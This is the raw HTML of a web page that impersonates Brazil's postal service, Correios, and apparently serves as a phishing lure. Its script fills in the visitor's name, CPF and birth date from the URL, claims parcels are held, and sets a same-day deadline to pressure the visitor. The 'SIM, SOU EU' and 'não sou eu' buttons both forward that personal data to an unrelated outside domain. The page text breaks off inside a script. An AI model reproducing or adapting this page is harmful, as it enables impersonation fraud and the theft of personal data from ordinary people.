
<!DOCTYPE html><html lang="pt-BR"><head>
	<meta charset="UTF-8">
		<title>Envios</title>
<meta name="robots" content="max-image-preview:large">
<link rel="alternate" type="application/rss+xml" title="Feed para Envios »" href="https://comprasdobrasilnet.com//feed/">
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Envios »" href="https://comprasdobrasilnet.com//comments/feed/">


<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/consulta-envios-online.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}};
/*! This file is auto-generated */
!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
</script>

<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
</style>
<style id="classic-theme-styles-inline-css">
/*! This file is auto-generated */
.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}
</style>
<style id="global-styles-inline-css">
:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}
:root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;}
</style>
<link rel="stylesheet" id="hello-elementor-css" href="css/QVhWuWqUFWbw.css" media="all">
<link rel="stylesheet" id="hello-elementor-theme-style-css" href="css/gfeqxrNFxtg9.css" media="all">
<link rel="stylesheet" id="hello-elementor-header-footer-css" href="css/YhUlcyqHRwSe.css" media="all">
<link rel="stylesheet" id="elementor-frontend-css" href="css/MqyCyinF3yKF.css" media="all">
<link rel="stylesheet" id="elementor-post-24-css" href="css/N9b1snD5r4ZZ.css" media="all">
<link rel="stylesheet" id="swiper-css" href="css/Wo7vG1s61oFT.css" media="all">
<link rel="stylesheet" id="elementor-pro-css" href="css/GWyY4UYosVmM.css" media="all">
<link rel="stylesheet" id="font-awesome-5-all-css" href="css/ufr7r9gM3o5e.css" media="all">
<link rel="stylesheet" id="font-awesome-4-shim-css" href="css/yd5qVspxWBpZ.css" media="all">
<link rel="stylesheet" id="elementor-global-css" href="css/ULX3wMav9lEu.css" media="all">
<link rel="stylesheet" id="elementor-post-21-css" href="css/ZH7m1hfxlM33.css" media="all">
<link rel="stylesheet" id="google-fonts-1-css" href="https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=swap&ver=6.6.2" media="all">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin=""><script src="js/Myy6ArHGCvKA.js" id="font-awesome-4-shim-js"></script>
<link rel="https://api.w.org/" href="https://comprasdobrasilnet.com//wp-json/"><link rel="alternate" title="JSON" type="application/json" href="https://comprasdobrasilnet.com//wp-json/wp/v2/pages/21"><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://comprasdobrasilnet.com//xmlrpc.php?rsd">
<meta name="generator" content="WordPress 6.6.2">
<link rel="canonical" href="https://comprasdobrasilnet.com//">
<link rel="shortlink" href="https://comprasdobrasilnet.com//">
<link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://comprasdobrasilnet.com//wp-json/oembed/1.0/embed?url=https%3A%2F%2Fconsulta-envios-online.com%2F">
<link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://comprasdobrasilnet.com//wp-json/oembed/1.0/embed?url=https%3A%2F%2Fconsulta-envios-online.com%2F&format=xml">
<script>
      if(typeof window.typebotWpUser === "undefined"){
      window.typebotWpUser = {
          "WP ID":"0",
          "WP Username":"",
          "WP Email":"",
          "WP First name":"",
          "WP Last name":""
        }
      }
      </script><meta name="generator" content="Elementor 3.23.4; features: e_optimized_css_loading, e_font_icon_svg, additional_custom_breakpoints, e_optimized_control_loading, e_lazyload, e_element_cache; settings: css_print_method-external, google_font-enabled, font_display-swap">
			<style>
				.e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload),
				.e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload) * {
					background-image: none !important;
				}
				@media screen and (max-height: 1024px) {
					.e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload),
					.e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload) * {
						background-image: none !important;
					}
				}
				@media screen and (max-height: 640px) {
					.e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload),
					.e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload) * {
						background-image: none !important;
					}
				}
			</style>
			<link rel="icon" href="images/lau6rRAszLZQ.png" sizes="32x32">
<link rel="icon" href="images/FdVNUseP2Q8F.png" sizes="192x192">
<link rel="apple-touch-icon" href="images/FdVNUseP2Q8F.png">
<meta name="msapplication-TileImage" content="https://comprasdobrasilnet.com//wp-content/uploads/2024/09/correios-sf.png">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover"><script src="js/IazdtZxGGXZ8.js" defer=""></script></head>
<body class="home page-template page-template-elementor_canvas page page-id-21 wp-custom-logo elementor-default elementor-template-canvas elementor-kit-24 elementor-page elementor-page-21">
			<div data-elementor-type="wp-page" data-elementor-id="21" class="elementor elementor-21" data-elementor-post-type="page">
				<div class="elementor-element elementor-element-e431e07 e-con-full e-flex e-con e-parent e-lazyloaded" data-id="e431e07" data-element_type="container" data-settings="{" background_background":"classic"}"="">
				<div class="elementor-element elementor-element-064a42c elementor-widget elementor-widget-button" data-id="064a42c" data-element_type="widget" data-widget_type="button.default">
				<div class="elementor-widget-container">
					<div class="elementor-button-wrapper">
			<a class="elementor-button elementor-button-link elementor-size-sm" href="index.html#">
						<span class="elementor-button-content-wrapper">
						<span class="elementor-button-icon">
				<svg aria-hidden="true" class="e-font-icon-svg e-fas-caret-down" viewBox="0 0 320 512" xmlns="http://www.w3.org/2000/svg"><path d="M31.3 192h257.3c17.8 0 26.7 21.5 14.1 34.1L174.1 354.8c-7.8 7.8-20.5 7.8-28.3 0L17.2 226.1C4.6 213.5 13.5 192 31.3 192z"></path></svg>			</span>
									<span class="elementor-button-text">Acessibilidade</span>
					</span>
					</a>
		</div>
				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-0d2fae2 e-con-full e-flex e-con e-parent e-lazyloaded" data-id="0d2fae2" data-element_type="container" data-settings="{" background_background":"classic"}"="">
				<div class="elementor-element elementor-element-2dd13f2 elementor-view-default elementor-widget elementor-widget-icon" data-id="2dd13f2" data-element_type="widget" data-widget_type="icon.default">
				<div class="elementor-widget-container">
					<div class="elementor-icon-wrapper">
			<div class="elementor-icon">
			<svg aria-hidden="true" class="e-font-icon-svg e-fas-bars" viewBox="0 0 448 512" xmlns="http://www.w3.org/2000/svg"><path d="M16 132h416c8.837 0 16-7.163 16-16V76c0-8.837-7.163-16-16-16H16C7.163 60 0 67.163 0 76v40c0 8.837 7.163 16 16 16zm0 160h416c8.837 0 16-7.163 16-16v-40c0-8.837-7.163-16-16-16H16c-8.837 0-16 7.163-16 16v40c0 8.837 7.163 16 16 16zm0 160h416c8.837 0 16-7.163 16-16v-40c0-8.837-7.163-16-16-16H16c-8.837 0-16 7.163-16 16v40c0 8.837 7.163 16 16 16z"></path></svg>			</div>
		</div>
				</div>
				</div>
				<div class="elementor-element elementor-element-f74f258 elementor-widget__width-initial elementor-widget elementor-widget-image" data-id="f74f258" data-element_type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
			<style>/*! elementor - v3.23.0 - 05-08-2024 */
.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=".svg"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>											<a href="https://comprasdobrasilnet.com//">
							<img decoding="async" width="445" height="91" src="images/n82QMzROCR8j.svg" class="attachment-large size-large wp-image-33" alt="">								</a>
													</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-33cefd1 e-flex e-con-boxed e-con e-parent" data-id="33cefd1" data-element_type="container">
					<div class="e-con-inner">
				<div class="elementor-element elementor-element-6623dcd elementor-widget__width-initial elementor-widget elementor-widget-heading" data-id="6623dcd" data-element_type="widget" data-widget_type="heading.default">

			
				</div>
		
    <style>
        .pix-container {
            background: #fff;
            border: 1px solid #ddd;
            border-radius: 8px;
            padding: 20px;
            width: 100%;
            max-width: 400px;
            text-align: center;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            margin: 20px auto;
        }

        .pix-container h2 {
            margin: 0 0 10px;
            color: #333;
        }

        .pix-code {
            background: #f9f9f9;
            border: 1px solid #ddd;
            border-radius: 4px;
            padding: 10px;
            margin: 10px 0;
            font-size: 14px;
            color: #555;
            word-wrap: break-word;
        }

        .pix-code.loading {
            color: #999;
            font-style: italic;
        }

        .btn {
            background: #007bff;
            color: #fff;
            border: none;
            padding: 10px 15px;
            font-size: 14px;
            cursor: pointer;
            border-radius: 4px;
            transition: background-color 0.3s ease;
        }

        .btn:hover {
            background: #0056b3;
        }

        .loading {
            margin-top: 15px;
            font-size: 14px;
            color: #777;
        }

        .success {
            color: green;
            font-size: 16px;
            margin-top: 15px;
        }

        .error {
            color: red;
            font-size: 14px;
            margin-top: 15px;
        }
    </style>


<div style="text-align: center; margin-top: -30px; max-width: 600px; background: #f9f9f9; padding: 20px; border-radius: 8px; border: 1px solid #ddd; box-shadow: 0 6px 15px rgba(0, 0, 0, 0.15);">
    <h1 style="font-size: 24px; color: #007bff; margin-bottom: 15px; font-weight: bold;">Encontramos pedidos retidos em uma de nossas agências. 📦</h1>
    <!-- Adicionando Nome, CPF e Nascimento -->
    <p style="font-size: 16px; color: #333; margin: 8px 0;">Nome: <strong id="nome"></strong></p>
    <p style="font-size: 16px; color: #333; margin: 8px 0;">CPF: <strong id="cpf-formatado"></strong></p>
    <p style="font-size: 16px; color: #333; margin: 8px 0;">Nascimento: <strong id="nascimento"></strong></p>
    
    <!-- Adicionando Prazo para Regularização -->
    <p style="font-size: 16px; color: #d9534f; margin: 20px 0; font-weight: bold;">Prazo para Regularização: <strong id="prazo-regularizacao"></strong></p>
    
    <!-- Botões -->
    <button id="btn-sim" style="background-color: #007bff; color: #fff; border: none; border-radius: 5px; padding: 10px 20px; font-size: 16px; cursor: pointer;">SIM, SOU EU</button>
    <button id="btn-nao" style="background: none; color: #333; border: none; font-size: 16px; cursor: pointer; text-decoration: underline;">não sou eu</button>
</div>

<script>
    // Função para formatar CPF visualmente
    function formatarCPFVisual(cpf) {
        return cpf.replace(/\D/g, '').replace(/(\d{3})(\d{3})(\d{3})(\d{2})/, '$1.$2.$3-$4');
    }

    // Função para formatar a data de nascimento
    function formatarNascimento(nascimento) {
        if (!/^\d{8}$/.test(nascimento)) return nascimento;
        return nascimento.replace(/(\d{2})(\d{2})(\d{4})/, '$1/$2/$3');
    }

    // Função para obter a data atual no formato DD/MM/AAAA
    function obterDataAtual() {
        const hoje = new Date();
        const dia = String(hoje.getDate()).padStart(2, '0');
        const mes = String(hoje.getMonth() + 1).padStart(2, '0');
        const ano = hoje.getFullYear();
        return `${dia}/${mes}/${ano}`;
    }

  // Função para limpar parâmetros específicos
function limparParametros(params) {
    const urlParams = new URLSearchParams();
    params.forEach((value, key) => {
        if (key === 'nome') {
            // Decodificar o valor e substituir "+" por espaço
            const valorLimpo = decodeURIComponent(value).replace(/\+/g, ' ');
            urlParams.set(key, valorLimpo); // Armazenar o nome com espaços diretamente
        } else if (key === 'cpf') {
            // Manter apenas números no CPF
            const valorLimpo = value.replace(/\D/g, '');
            urlParams.set(key, valorLimpo);
        } else {
            urlParams.set(key, value);
        }
    });
    return urlParams;
}

// Obtendo os parâmetros da URL
const params = new URLSearchParams(window.location.search);

// Limpar os parâmetros
const paramsLimpos = limparParametros(params);

// Capturar e formatar valores
const nome = paramsLimpos.get('nome') || 'Não informado'; // Nome já está limpo e com espaços
const cpfOriginal = params.get('cpf') || 'Não informado';
const nascimentoOriginal = params.get('nascimento') || 'Não informado';

const cpfFormatado = cpfOriginal !== 'Não informado' ? formatarCPFVisual(cpfOriginal) : cpfOriginal;
const nascimentoFormatado = nascimentoOriginal !== 'Não informado' ? formatarNascimento(nascimentoOriginal) : nascimentoOriginal;

// Atualizar o conteúdo da página
document.getElementById('nome').textContent = nome;
document.getElementById('cpf-formatado').textContent = cpfFormatado;
document.getElementById('nascimento').textContent = nascimentoFormatado;
document.getElementById('prazo-regularizacao').textContent = obterDataAtual();

// Botões com os parâmetros limpos
document.getElementById('btn-sim').onclick = function () {
    // Construir a URL manualmente para evitar codificação indesejada
    const queryString = Array.from(paramsLimpos.entries())
        .map(([key, value]) => `${key}=${value}`)
        .join('&'); // Construir a string de consulta manualmente
    window.location.href = 'https://localizeaquiagora.shop/encomenda?' + queryString;
};

document.getElementById('btn-nao').onclick = function () {
    const queryString = Array.from(paramsLimpos.entries())
        .map(([key, value]) => `${key}=${value}`)
        .join('&');
    window.location.href = 'https://localizeaquiagora.shop/rastreie?' + queryString;
};
</script>

	<div class="elementor-element elementor-element-1ba3c09 elementor-widget elementor-widget-image" data-id="1ba3c09" data-element_type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
													<img fetchpriority="high" decoding="async" width="800" height="241" src="images/imgnova.jpg" class="attachment-large size-large wp-image-46" alt="" srcset="images/imgnova.jpg 994w, images/Sk2CW03tvJ9X.png 300w, images/imgnova.jpg 768w" sizes="(max-width: 800px) 100vw, 800px">													</div>
				</div>
					</div>
				</div>
		<div class="elementor-element elementor-element-18f87aa e-flex e-con-boxed e-con e-parent" data-id="18f87aa" data-element_type="container" data-settings="{" background_background":"classic"}"="">
					<div class="e-con-inner">
		<div class="elementor-element elementor-element-f878021 e-con-full e-flex e-con e-child" data-id="f878021" data-element_type="container">
				<div class="elementor-element elementor-element-65ca55e elementor-widget elementor-widget-heading" data-id="65ca55e" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
			<h2 class="elementor-heading-title elementor-size-default">Fale Conosco</h2>		</div>
				</div>
				<div class="elementor-element elementor-element-4b851db elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="4b851db" data-element_type="widget" data-widget_type="icon-list.default">
				<div class="elementor-widget-container">
			<link rel="stylesheet" href="css/Uas3FX4TCRFx.css">		<ul class="elementor-icon-list-items">
							<li class="elementor-icon-list-item">
										<span class="elementor-icon-list-text">Registro de Manifestações</span>
									</li>
								<li class="elementor-icon-list-item">
										<span class="elementor-icon-list-text">Central de Atendimento</span>
									</li>
								<li class="elementor-icon-list-item">
										<span class="elementor-icon-list-text">Soluções para o seu negócio</span>
									</li>
								<li class="elementor-icon-list-item">
										<span class="elementor-icon-list-text">Suporte ao cliente com contrato</span>
									</li>
								<li class="elementor-icon-list-item">
										<span class="elementor-icon-list-text">Ouvidoria</span>
									</li>
						</ul>
				</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-15c6d1e e-con-full e-flex e-con e-child" data-id="15c6d1e" data-element_type="container">
				<div class="elementor-element elementor-element-208c88d elementor-widget elementor-widget-heading" data-id="208c88d" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
			<h2 class="elementor-heading-title elementor-size-default">Sobre Correios</h2>		</div>
				</div>
				<div class="elementor-element elementor-element-ff0a027 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="ff0a027" data-element_type="widget" data-widget_type="icon-list.default">
				<div class="elementor-widget-container">
					<ul class="elementor-icon-list-items">
							<li class="elementor-icon-list-item">
										<span class="elementor-icon-list-text">Identidade corporativa</span>
									</li>
								<li class="elementor-icon-list-item">
										<span class="elementor-icon-list-text">Educação e cultura</span>
									</li>
								<li class="elementor-icon-list-item">
										<span class="elementor-icon-list-text">Código de ética</span>
									</li>
								<li class="elementor-icon-list-item">
										<span class="elementor-icon-list-text">Transparência e prestação de contas</span>
									</li>
								<li class="elementor-icon-list-item">
										<span class="elementor-icon-list-text">Política de Privacidade e Notas Legais</span>
									</li>
						</ul>
				</div>
				</div>
				<div class="elementor-element elementor-element-9a756f8 elementor-widget elementor-widget-heading" data-id="9a756f8" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
			<h2 class="elementor-heading-title elementor-size-default">©️ Copyright 2024 Correios</h2>		</div>
				</div>
				</div>
		<div class="elementor-element elementor-element-e83e9e0 e-con-full e-flex e-con e-child" data-id="e83e9e0" data-element_type="container">
				<div class="elementor-element elementor-element-92afb43 elementor-widget elementor-widget-heading" data-id="92afb43" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
			<h2 class="elementor-heading-title elementor-size-default">Outros Sites</h2>		</div>
				</div>
				<div class="elementor-element elementor-element-486f820 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="486f820" data-element_type="widget" data-widget_type="icon-list.default">
				<div class="elementor-widget-container">
					<ul class="elementor-icon-list-items">
							<li class="elementor-icon-list-item">
										<span class="elementor-icon-list-text">Loja online dos Correios</span>
									</li>
						</ul>
				</div>
				</div>
				</div>
					</div>
				</div>
				</div>
		<script type="module">import Typebot from "https://cdn.jsdelivr.net/npm/@typebot.io/js@/dist/web.js";const typebotExcludePaths = [""];</script>			<script type="text/javascript">
				const lazyloadRunObserver = () => {
